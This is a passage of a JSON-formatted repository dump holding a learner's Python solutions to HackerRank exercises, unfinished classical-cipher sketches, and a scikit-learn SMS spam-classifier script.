subscribed\n# for french newspaper and take input for their roll nos\nb = int(input())\ns2 = set(map(int, input().split()))\n\n# we take n and b's union and print its length\na = s1.union(s2)\nprint(len(a))\n\n# we take n and b's intersection and print its length\nb = s1.intersection(s2)\nprint(len(b))\n\nc = s1.difference(s2)\nprint(len(c))\n\nd = s1.symmetric_difference(s2)\nprint(len(d))\n" }, { "alpha_fraction": 0.6282051205635071, "alphanum_fraction": 0.6452991366386414, "avg_line_length": 18.58333396911621, "blob_id": 
"cf330ecb472192de38c38556f347a034091ebac2", "content_id": "3d0b4ce781b193ac160b9c5c022ed0ea10ee39b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 234, "license_type": "no_license", "max_line_length": 53, "num_lines": 12, "path": "/set_add.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# problem is to add elements from given list or input\n# to a set and get the length of resultant set\n\nN = int(input())\nset1 = set()\n#s = input().split()\n\nfor i in range(N):\n s = input()\n set1.add(s)\n#print(set1)\nprint(len(set1))" }, { "alpha_fraction": 0.6691842675209045, "alphanum_fraction": 0.6858006119728088, "avg_line_length": 23.55555534362793, "blob_id": "e99a4136d01bc728c689e0a9351d019e5636bd58", "content_id": "92297ce552ed2a7b769cd758734b9eb6f627e479", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 662, "license_type": "no_license", "max_line_length": 74, "num_lines": 27, "path": "/beautiful_binary_string.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# a binary string is not beautiful if '010' is present as its substring\n# ques asks to return minimum number of changes from 0 to 1 and vice versa\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the beautifulBinaryString function below.\ndef beautifulBinaryString(b):\n # here what we are doing is print the number of occurances of '010'\n # because that will be the number of changes we will have to do\n return b.count('010')\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n b = input()\n\n result = beautifulBinaryString(b)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()" }, { "alpha_fraction": 0.7297762632369995, "alphanum_fraction": 0.7297762632369995, "avg_line_length": 40.57143020629883, "blob_id": "252238c3741e1de6dc43d2ef58f796b29a5f3cf1", 
"content_id": "c1ea322085d7fa09e8ae2f0d72edd2778c5bc87d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 83, "num_lines": 14, "path": "/athlete_sort.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we are asked to sort the list of given athletes based on Kth attribute\n# we take input of number of athletes and attribute for each of them\nN, M = map(int, input().split())\n#input of details of athletes\nrows = [input() for _ in range(N)]\nprint(rows)\n# attribute on which we have to sort the details\nK = int(input())\n\n# here we use sorted method to sort the lists\n# here in sorted we are passing our list of athlete and\n# key is for passing the particular attribute on which we will be sorting our lists\nfor row in sorted(rows, key=lambda row: int(row.split()[K])):\n print(row)" }, { "alpha_fraction": 0.5426008701324463, "alphanum_fraction": 0.560538113117218, "avg_line_length": 19.363636016845703, "blob_id": "09747f1a8f72b4985bb9545b0af34aa7a4ddd36d", "content_id": "912240966ac298403ebc78bff2b0536c7799c018", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 45, "num_lines": 11, "path": "/sets_no_idea.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "k = list(map(int, input().split()))\nN = k[0]\nM = k[1]\n\nset1 = list(map(int, input().split()))\n\nA = set(map(int, input().split()))\nB = set(map(int, input().split()))\n\ntemp = sum((i in A) - (i in B) for i in set1)\nprint(temp)" }, { "alpha_fraction": 0.4781144857406616, "alphanum_fraction": 0.48821547627449036, "avg_line_length": 25.81818199157715, "blob_id": "c46862f2babe0e10f2eb9be087bfca3188a0b5a6", "content_id": "7c802057f66b1d16bd7f354a4a70585417b63ba5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 297, "license_type": "no_license", "max_line_length": 102, "num_lines": 11, "path": "/list_comprehension.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "if __name__ == '__main__':\n x = int(input(\"Enter X:\"))\n y = int(input(\"Enter Y:\"))\n z = int(input(\"Enter Z:\"))\n n = int(input(\"Enter N:\"))\n\n my_list = [[i,j,k] for i in range(x+1) for j in range(y+1) for k in range(z+1) if i + j + k != n ]\n\n my_list.sort()\n\n print(my_list)\n\n\n" }, { "alpha_fraction": 0.6783692240715027, "alphanum_fraction": 0.6828992366790771, "avg_line_length": 29.482759475708008, "blob_id": "1a76d833d3b6d82d54003c019062bcb48d566b3d", "content_id": "4931cd8852dde73499e95105df78d0f9f4487870", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 883, "license_type": "no_license", "max_line_length": 92, "num_lines": 29, "path": "/itertools_maximize_it.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# #my code but some test cases are wrong\n# k,m = input().split()\n# sum = 0\n# for i in range(int(k)):\n# l = max([int(x) for x in input().split())\n# sum+= l*l\n# print(sum%int(m))\n\n\n\n\nfrom itertools import product\n\n# taking input of k and m\nK,M = map(int,input().split())\n\n# taking input for k lines\n# in each line the first element will be the number of elements in that line so we ignore it\nN = (list(map(int, input().split()))[1:] for _ in range(K))\n\n# here we are using list comprehension\n# we are taking cartesian product of elementes of N list\n# we then take each list form this list of cartesian product and take sum of their squares\n#and store them in the results\nresults = [sum(num**2 for num in numbers) % M for numbers in product(*N)]\n#results = map(lambda x: sum(i**2 for i in x)%M, product(*N))\n\n# we are printing the max value from results list\nprint(max(results))" }, { "alpha_fraction": 0.7111650705337524, 
"alphanum_fraction": 0.7111650705337524, "avg_line_length": 40.29999923706055, "blob_id": "b778f972327c9586a629d72184b46a757cbb0286", "content_id": "c2706272cedc2ba7145a749d4541b6d6a95ef489", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 412, "license_type": "no_license", "max_line_length": 79, "num_lines": 10, "path": "/strict_superset.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we have to check if A is strict superset of other sets\n# input for set A\nA = set(map(int, input().split()))\nN = int(input())\n\n# here we are using all() method which returns true only if all are true\n# we are taking input for N sets in the equation itself by using comprehension\n# also we are checking if A is superset here\ntemp = all(A.issuperset(set(map(int, input().split()))) for _ in range(N))\nprint(temp)" }, { "alpha_fraction": 0.6322580575942993, "alphanum_fraction": 0.6322580575942993, "avg_line_length": 37.875, "blob_id": "96e393a0a102fa9fb2b061d089713262b3b62f57", "content_id": "cbd9bdaaac11492595436ceacf8fe2e41e80f443", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": "no_license", "max_line_length": 98, "num_lines": 8, "path": "/date_and_time_time_delta.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "from datetime import datetime as dt\n\n\nfmt = '%a %d %b %Y %H:%M:%S %z'\nfor i in range(int(input())):\n #strptime will format give time int number/date format and make it easy to process in equation\n print(int(abs((dt.strptime(input(), fmt) -\n dt.strptime(input(), fmt)).total_seconds())))" }, { "alpha_fraction": 0.6710875034332275, "alphanum_fraction": 0.6856763958930969, "avg_line_length": 31.826086044311523, "blob_id": "b697c552bf853a8d59f4f68a5f02f6edff19b28a", "content_id": "15545159021dce04faa9fb6053cc9770bd84bc63", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 754, "license_type": "no_license", "max_line_length": 70, "num_lines": 23, "path": "/collections_namedtuple.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "from collections import namedtuple\n\n# taking input for number of students\nn = int(input())\n# taking names of different columns\nfields = input().split()\n\ntotal = 0 # total of marks\nfor i in range(n):\n # declaring a named tuple\n students = namedtuple('student',fields)\n # taking input for values of field\n field1, field2, field3,field4 = input().split()\n # placing this values in tuple\n student = students(field1,field2,field3,field4)\n # picking up the marks from tuple\n total += int(student.MARKS)\nprint('{0:.2f}'.format(total/n))\n\n# shorter method\n# here we only pick up the marks section from input\n# stu, marks = int(input()), input().split().index(\"MARKS\")\n# print (sum([int(input().split()[marks]) for _ in range(stu)]) / stu)" }, { "alpha_fraction": 0.6040608882904053, "alphanum_fraction": 0.6142131686210632, "avg_line_length": 23.375, "blob_id": "ecad00fe70cde147de2d5775be06fd8c97d8e127", "content_id": "d2c18b79a14063653dcdeee94f0f65707a248d81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 197, "license_type": "no_license", "max_line_length": 42, "num_lines": 8, "path": "/itertools_combinations.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "from itertools import combinations\n\na,b= input().split()\n\nfor i in range(1,int(b)+1):\n # x = (list(combinations(sorted(a),i)))\n for j in combinations(sorted(a),i):\n print(\"\".join(j))\n\n\n" }, { "alpha_fraction": 0.5799999833106995, "alphanum_fraction": 0.6200000047683716, "avg_line_length": 15.107142448425293, "blob_id": "91a1973cb77baf4be023b5d83256df3de24939a9", "content_id": "e59566bed823bd99d0535b0bbfc9f30425ef6339", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 450, "license_type": "no_license", "max_line_length": 53, "num_lines": 28, "path": "/anagram.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "#this a random program found in the notifications\n\n# s1 = input()\n# s2 = input()\n#\n# set1 = set()\n# set2 = set()\n#\n# for i in s1:\n# set1.add(i)\n# for i in s2:\n# set2.add(i)\n#\n# diff = set1.symmetric_difference(set2)\n# #print(diff)\n# print(len(diff))\n# # print(set1)\n# # print(set2)\n\n#Method 2:\ns1 = input()\ns2 = input()\n\n\ntotal = 0\nfor letter in \"abcdefghijklmnopqrstuvwxyz\":\n total += abs(s1.count(letter) - s2.count(letter))\nprint(total)" }, { "alpha_fraction": 0.6102564334869385, "alphanum_fraction": 0.6239316463470459, "avg_line_length": 26.85714340209961, "blob_id": "2601e754cff3263ee0fbb1cd496d2dd6098fec04", "content_id": "9cbc923fa28f2f1585201113a2e1fc3bc7c27318", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 585, "license_type": "no_license", "max_line_length": 73, "num_lines": 21, "path": "/collections_counter.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "from collections import Counter\n\nx = int(input())\n# using counter to create a dictionary\n# this dictonary will contain the count of each element of the string\nd = Counter(map(int,input().split())) # for this we have to map our input\n\nn = int(input())\nl1 = [] # earning = 0\n\nfor i in range(n):\n a,b = map(int, input().split())\n\n # checking if it exists in the dictonary\n if d[a]>0: # if a in d.keys() and d[a]>0:\n # adding money to total earning\n l1.append(b)\n # decrementing the value present by 1\n d[a]-= 1\n\nprint(sum(l1)) # print(earning)\n" }, { "alpha_fraction": 0.4881889820098877, "alphanum_fraction": 0.5244094729423523, "avg_line_length": 17.14285659790039, "blob_id": "8241b067042683930266ec0d5ac343978fb540f8", "content_id": 
"26aff35d282f40fd06d70b0f4a5daae0d72f8208", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 635, "license_type": "no_license", "max_line_length": 42, "num_lines": 35, "path": "/playfair_cipher_2.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def matrix(key):\n m = []\n alphabet = \"ABCDEFGHIKLMNOPQRSTUVWXYZ\"\n\n for i in key.upper():\n if i not in m:\n m.append(i)\n\n for i in alphabet:\n if i not in m:\n m.append(i)\n\n m_group = []\n for i in range(5):\n m_group.append('')\n m_group[0] = m[0:5]\n m_group[1] = m[5:10]\n m_group[2] = m[10:15]\n m_group[3] = m[15:20]\n m_group[4] = m[20:25]\n\n return m_group\n\ndef groups(text):\n for i in range(len(text)):\n pass\ndef encrypt():\n pass\ndef decrypt():\n pass\n\ntext = input(\"Enter Your message here:\")\nkey = input(\"Enter your key:\")\n\nprint(matrix(key))\n" }, { "alpha_fraction": 0.4727272689342499, "alphanum_fraction": 0.47727271914482117, "avg_line_length": 20, "blob_id": "0805232552f2c6a94e86119471488e6cf3528106", "content_id": "22faff50e26f21a939621261978e7ec96dc69a28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 440, "license_type": "no_license", "max_line_length": 33, "num_lines": 21, "path": "/minion_game.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def minion_game(string):\n vowels = 'AEIOU'\n\n k_score = 0\n s_score = 0\n\n for i in range(len(string)):\n if string[i] in vowels:\n k_score += (len(s)-i)\n else:\n s_score += (len(s)-i)\n\n if s_score > k_score:\n print(\"Stuart\", s_score)\n elif k_score > s_score:\n print(\"Kevin\", k_score)\n else:\n print(\"Draw\")\nif __name__ == '__main__':\n s = input()\n minion_game(s)" }, { "alpha_fraction": 0.6789297461509705, "alphanum_fraction": 0.7023411393165588, "avg_line_length": 28.799999237060547, "blob_id": "cc29a91e91c4d606da298b0f9cffd7d62cb28b0c", "content_id": 
"e1e2139eda7148ef86de4a6dc4d0e824bc2898c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 299, "license_type": "no_license", "max_line_length": 63, "num_lines": 10, "path": "/math_polar_coordinates.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "import cmath\n# taking input as a complex number\nn = complex(input())\n\n# taking out two arguements from the complex number\nr = abs(complex(n))\nr2 = cmath.phase(complex(n))\n\nprint(f'{r:.3f}\\n{r2:.3f}') # method not accepted by hackerrank\n# print(\"{0:.3f}\".format(r2)) # method accepted by hackerrank\n\n" }, { "alpha_fraction": 0.48534202575683594, "alphanum_fraction": 0.5114006400108337, "avg_line_length": 27, "blob_id": "2aa48766daed0b40a4ce1ec2bb374d88d94111c1", "content_id": "c7b69249c8df7d260bd0bb81ca022332cad9c07e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 307, "license_type": "no_license", "max_line_length": 69, "num_lines": 11, "path": "/string_formatting.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def print_formatted(number):\n print(bin(number))\n a = len(bin(number)[2:])\n #a = len(\"{0:b}\".format(number))\n #print(a)\n for num in range(1,number+1):\n print(\"{0:{a}} {0:{a}o} {0:{a}X} {0:{a}b}\".format(num,a = a))\n\nif __name__ == '__main__':\n n = int(input())\n print_formatted(n)" }, { "alpha_fraction": 0.6078431606292725, "alphanum_fraction": 0.6078431606292725, "avg_line_length": 28.190475463867188, "blob_id": "63b14b138ac9a460d8869bde1c94324507379abb", "content_id": "68cd9be06bf42ed0f744e7ab1ab252189b6da0b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 612, "license_type": "no_license", "max_line_length": 64, "num_lines": 21, "path": "/itertools_compress_the_string.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# # n = 
input()\n# # l = {}\n# # for i in n:\n# # a = n.count(i)\n# # if i not in l:\n# # l[i] = a\n# # print(*l)\n# from itertools import groupby\n# i,j = groupby(input())\n# print(*list(i))\n# print(*j)\n# # for i in n:\n# # print(len(list(i)))\n# # print(j)\n\nfrom itertools import groupby\n# here we are unpacking the items from the list comprehensiom\n# we are distributing the outputs of groupby function in a and b\n# here a is the element and b is the occurance of that number\n# after that we are taking the len of list(b) and int(a)\nprint(*[(len(list(b)), int(a)) for a, b in groupby(input())])" }, { "alpha_fraction": 0.5742297172546387, "alphanum_fraction": 0.5798319578170776, "avg_line_length": 31.545454025268555, "blob_id": "b2be0a02806685cabafa23fdb3ed7b0dc6e8b3f6", "content_id": "a5a5aa9fb360248ca4b6d9931da21fe40e7eb746", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "no_license", "max_line_length": 117, "num_lines": 11, "path": "/swap_cases.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def swap_cases(s):\n ans = []\n for i in s:\n if i.isupper() == True: #checking if the letter is in upper case, if true then it we convert it to lowercase\n ans.append(i.lower())\n else:\n ans.append(i.upper())\n s1 = ''.join(ans) # joining the elements of ans list to form a string\n print(s1)\n\nswap_cases(input())" }, { "alpha_fraction": 0.5547618865966797, "alphanum_fraction": 0.5571428537368774, "avg_line_length": 23, "blob_id": "64b4ef2fbb22cd685e8ece821d46f2b6b8173b1b", "content_id": "feb4d7ec6464ac86dc1a2085560947f502cc6f36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 840, "license_type": "no_license", "max_line_length": 57, "num_lines": 35, "path": "/row_transposition_cipher.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we have to implement row transposition 
cipher\n\n# taking input for\nkey = [l for l in input(\"Enter Key:\")]\nplain_text = ''.join(input(\"Enter the message:\").split())\n\nprint(\"Key is: \", key)\ncolumns = int(max(key))\nprint('No of columns is ',columns)\n\n# checking for nummber of rows:\nif len(plain_text) % columns == 0:\n rows = len(plain_text)//columns\nelse:\n rows = (len(plain_text)//columns) + 1\nprint('No of rows is ',rows)\n\nmatrix = []\n\n# for k in plain_text:\n# for i in range(rows):\n# for j in range(columns):\n# if k == '':\n# matrix.append('x')\n# else:\n# matrix.append(k)\n\nfor i in range(rows):\n for j in range(columns):\n if plain_text[i + j] == '':\n matrix.append('x')\n else:\n matrix.append(plain_text[i + j])\n\nprint(matrix)\n" }, { "alpha_fraction": 0.46954813599586487, "alphanum_fraction": 0.5461689829826355, "avg_line_length": 13.166666984558105, "blob_id": "ea37fcb795c6a9d89905f1a5cba96deae12bf035", "content_id": "36fcb01b8aae95b10e49ebc934acddb1f6673a9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 509, "license_type": "no_license", "max_line_length": 88, "num_lines": 36, "path": "/nested_lists.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "n = int(input())\n\nmy_list = []\nlist2 = []\n\nfor i in range(0,n):\n my_list.append([input(), float(input())])\nmy_list.sort()\n\nfor i in range(len(my_list)):\n list2.append(my_list[i][1])\n\na = list(set(list2))\na.sort()\n\nsecond_lowest = a[1]\n\nfor i in range(len(my_list)):\n if my_list[i][1] == second_lowest:\n print(my_list[i][0])\n\n\n\n# 5\n# Harry\n# 37.21\n# Berry\n# 37.21\n# Tina\n# 37.2\n# Akriti\n# 41\n# Harsh\n# 39\n\n#a = [['Harry', 37.21], ['Berry', 37.21], ['Tina', 37.2], ['Akriti', 41], ['Harsh', 39]]" }, { "alpha_fraction": 0.6948052048683167, "alphanum_fraction": 0.6948052048683167, "avg_line_length": 29.799999237060547, "blob_id": "72df4d2734d79e629cc5cf418dc607b9cca83a6a", "content_id": 
"526f7fc77e93cba10148588a3586cf5c9a19d15c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": "no_license", "max_line_length": 77, "num_lines": 5, "path": "/math_mod_divmod.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "a, b = int(input()), int(input())\nprint(a//b)\nprint(a%b)\n# divmod function divides a by b and returns a tuple of quoient and remainder\nprint(divmod(a,b))\n" }, { "alpha_fraction": 0.6928089261054993, "alphanum_fraction": 0.7018850445747375, "avg_line_length": 35.52124786376953, "blob_id": "f7f4bfdebf8658b4b8c7f67a46721b56a171125f", "content_id": "48ce2defa1459d1218d8c1800b5cfcf08aeb7aac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12891, "license_type": "no_license", "max_line_length": 133, "num_lines": 353, "path": "/project.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "#% matplotlib\n#inline\nimport matplotlib.pyplot as plt\nimport csv\nfrom textblob import TextBlob\nimport pandas\nimport sklearn\nimport cPickle\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.metrics import classification_report, f1_score, accuracy_score, confusion_matrix\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.cross_validation import StratifiedKFold, cross_val_score, train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.learning_curve import learning_curve\n\n## loading data using Pandas\n\nmessages = pandas.read_csv(\n 'sms_spam.csv',\n names = [\"label\", \"message\"])\nprint(messages)\n\n## To get pivot of dataset\n\nmessages.groupby('label').describe()\n\n## adding extra column to get the length of the text\n\nmessages['length'] = 
messages['message'].map(lambda text: len(text))\nprint(messages.head())\n\n## plotting\n\nmessages.length.plot(bins=20, kind='hist')\n\nmessages.length.describe()\n\n## to check the longest messages\n\nprint(list(messages.message[messages.length > 900]))\n\n## checking out the difference between ham and spam\n\nmessages.hist(column='length', by='label', bins=50)\n\n\n## Data Preprocessing\n\n## we'll use the bag-of-words approach, where each unique word in a text will be represented by one number.\n\n## splitting it into tokens\n\ndef split_into_tokens(message):\n message = unicode(message, 'utf8') # convert bytes into proper unicode\n return TextBlob(message).words\n\n\n## original text\n\nmessages.message.head()\n\n## now text after tokenized\n\nmessages.message.head().apply(split_into_tokens)\n\n## Part of speech tag (POS)\n\nTextBlob(\"Hello world, how is it going?\").tags # list of (word, POS) pairs\n\n\n## lemmatizing --- normalize words into their base form\n\ndef split_into_lemmas(message):\n message = unicode(message, 'utf8').lower()\n words = TextBlob(message).words\n # for each word, take its \"base form\" = lemma\n return [word.lemma for word in words]\n\n\nmessages.message.head().apply(split_into_lemmas)\n\n## Data to Vectors\n\n# Now we'll convert each message, represented as a list of tokens (lemmas) above,\n# into a vector that machine learning models can understand.\n\n# Doing that requires essentially three steps, in the bag-of-words model:\n\n# 1. counting how many times does a word occur in each message (term frequency)\n# 2. weighting the counts, so that frequent tokens get lower weight (inverse document frequency)\n# 3. 
normalizing the vectors to unit length, to abstract from the original text length (L2 norm)\n\n# Each vector has as many dimensions as there are unique words in the SMS corpus:\n\nbow_transformer = CountVectorizer(analyzer = split_into_lemmas).fit(messages['message'])\nprint(len(bow_transformer.vocabulary_))\n\n# Here we used `scikit-learn` (`sklearn`), a powerful Python library for teaching machine learning.\n# It contains a multitude of various methods and options.\n\n# Let's take one text message and get its bag-of-words counts as a vector, putting to use our new `bow_transformer`:\n\n## Feature Engineering\n\nmessage4 = messages['message'][3]\nprint(message4)\n\nbow4 = bow_transformer.transform([message4])\nprint(bow4)\nprint(bow4.shape)\n\n# So, nine unique words in message nr. 4, two of them appear twice, the rest only once.\n# lets check what are these words the appear twice?\n\nprint(bow_transformer.get_feature_names()[6736])\nprint(bow_transformer.get_feature_names()[8013])\n\nmessages_bow = bow_transformer.transform(messages['message'])\nprint('sparse matrix shape:', messages_bow.shape)\nprint('number of non-zeros:', messages_bow.nnz)\nprint('sparsity: %.2f%%' % (100.0 * messages_bow.nnz / (messages_bow.shape[0] * messages_bow.shape[1])))\n\n# And finally, after the counting, the term weighting and normalization\n# can be done with [TF-IDF] using scikit-learn's `TfidfTransformer`:\n\ntfidf_transformer = TfidfTransformer().fit(messages_bow)\ntfidf4 = tfidf_transformer.transform(bow4)\nprint(tfidf4)\n\n# To check what is the IDF (inverse document frequency) of the word `\"u\"`? 
Of word `\"university\"`?\n\nprint\ntfidf_transformer.idf_[bow_transformer.vocabulary_['u']]\nprint(tfidf_transformer.idf_[bow_transformer.vocabulary_['university']])\n\n# To transform the entire bag-of-words corpus into TF-IDF corpus at once:\n\nmessages_tfidf = tfidf_transformer.transform(messages_bow)\nprint(messages_tfidf.shape)\n\n## Training a model\n# We'll be using scikit-learn here, choosing the [Naive Bayes](http://en.wikipedia.org/wiki/Naive_Bayes_classifier)\n# classifier to start with:\n\n#% time\nspam_detector = MultinomialNB().fit(messages_tfidf, messages['label'])\n\n\n\n\n# Let's try classifying our single random message:\nprint('predicted:', spam_detector.predict(tfidf4)[0])\nprint('expected:', messages.label[3])\n\nall_predictions = spam_detector.predict(messages_tfidf)\nprint(all_predictions)\n\n## Calculating accuracy and confusion matrix on Training data which will definitely give good accuracy\n\nprint('accuracy', accuracy_score(messages['label'], all_predictions))\nprint('confusion matrix\\n', confusion_matrix(messages['label'], all_predictions))\nprint('(row=expected, col=predicted)')\n\nplt.matshow(confusion_matrix(messages['label'], all_predictions), cmap=plt.cm.binary, interpolation='nearest')\nplt.title('confusion matrix')\nplt.colorbar()\nplt.ylabel('expected label')\nplt.xlabel('predicted label')\n\nprint(classification_report(messages['label'], all_predictions))\n\n## splitting the data into training and testing\n\nmsg_train, msg_test, label_train, label_test = \\\n train_test_split(messages['message'], messages['label'], test_size=0.2)\n\nprint(len(msg_train), len(msg_test), len(msg_train) + len(msg_test))\n\npipeline = Pipeline([\n ('bow', CountVectorizer(analyzer=split_into_lemmas)), # strings to token integer counts\n ('tfidf', TfidfTransformer()), # integer counts to weighted TF-IDF scores\n ('classifier', MultinomialNB()), # train on TF-IDF vectors w/ Naive Bayes classifier\n])\n\n## Cross Validation\n\n# A common practice is 
to partition the training set again, into smaller subsets; for example, 5 equally sized subsets.\n# Then we train the model on four parts, and compute accuracy on the last part (called \"validation set\").\n# Repeated five times (taking different part for evaluation each time), we get a sense of model \"stability\".\n# If the model gives wildly different scores for different subsets, it's a sign something is wrong (bad data, or bad model variance).\n# Go back, analyze errors, re-check input data for garbage, re-check data cleaning.\n\nscores = cross_val_score(pipeline, # steps to convert raw messages into models\n msg_train, # training data\n label_train, # training labels\n cv=10, # split data randomly into 10 parts: 9 for training, 1 for scoring\n scoring='accuracy', # which scoring metric?\n n_jobs=-1, # -1 = use all cores = faster\n )\nprint(scores)\nprint(scores.mean(), scores.std())\n\n\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,\n n_jobs=-1, train_sizes=np.linspace(.1, 1.0, 5)):\n \"\"\"\n Generate a simple plot of the test and traning learning curve.\n\n Parameters\n ----------\n estimator : object type that implements the \"fit\" and \"predict\" methods\n An object of that type which is cloned for each validation.\n\n title : string\n Title for the chart.\n\n X : array-like, shape (n_samples, n_features)\n Training vector, where n_samples is the number of samples and\n n_features is the number of features.\n\n y : array-like, shape (n_samples) or (n_samples, n_features), optional\n Target relative to X for classification or regression;\n None for unsupervised learning.\n\n ylim : tuple, shape (ymin, ymax), optional\n Defines minimum and maximum yvalues plotted.\n\n cv : integer, cross-validation generator, optional\n If an integer is passed, it is the number of folds (defaults to 3).\n Specific cross-validation objects can be passed, see\n sklearn.cross_validation module for the list of possible objects\n\n n_jobs : integer, 
optional\n Number of jobs to run in parallel (default 1).\n \"\"\"\n plt.figure()\n plt.title(title)\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n train_sizes, train_scores, test_scores = learning_curve(\n estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label=\"Cross-validation score\")\n\n plt.legend(loc=\"best\")\n return plt\n\n#% time\nplot_learning_curve(pipeline, \"accuracy vs. training set size\", msg_train, label_train, cv=5)\n\n# At this point, we have two options:\n\n# 1. use more training data, to overcome low model complexity\n# 2. 
use a more complex (lower bias) model to start with, to get more out of the existing data\n\nparams = {\n 'tfidf__use_idf': (True, False),\n 'bow__analyzer': (split_into_lemmas, split_into_tokens),\n}\n\ngrid = GridSearchCV(\n pipeline, # pipeline from above\n params, # parameters to tune via cross validation\n refit=True, # fit using all available data at the end, on the best found param combination\n n_jobs=-1, # number of cores to use for parallelization; -1 for \"all cores\"\n scoring='accuracy', # what score are we optimizing?\n cv=StratifiedKFold(label_train, n_folds=5), # what type of cross validation to use\n)\n\n#% time\nnb_detector = grid.fit(msg_train, label_train)\nprint(nb_detector.grid_scores_)\n\nprint(nb_detector.predict_proba([\"Hi mom, how are you?\"])[0])\nprint(nb_detector.predict_proba([\"WINNER! Credit for free!\"])[0])\n\nprint(nb_detector.predict([\"Hi mom, how are you?\"])[0])\nprint(nb_detector.predict([\"WINNER! Credit for free!\"])[0])\n\n# And overall scores on the test set, the one we haven't used at all during training\n\npredictions = nb_detector.predict(msg_test)\nprint(confusion_matrix(label_test, predictions))\nprint(classification_report(label_test, predictions))\n\n#############################################################################################################\n\n################## SVM #########################################\n\npipeline_svm = Pipeline([\n ('bow', CountVectorizer(analyzer=split_into_lemmas)),\n ('tfidf', TfidfTransformer()),\n ('classifier', SVC()), # <== change here\n])\n\n# pipeline parameters to automatically explore and tune\nparam_svm = [\n {'classifier__C': [1, 10, 100, 1000], 'classifier__kernel': ['linear']},\n {'classifier__C': [1, 10, 100, 1000], 'classifier__gamma': [0.001, 0.0001], 'classifier__kernel': ['rbf']},\n]\n\ngrid_svm = GridSearchCV(\n pipeline_svm, # pipeline from above\n param_grid=param_svm, # parameters to tune via cross validation\n refit=True, # fit 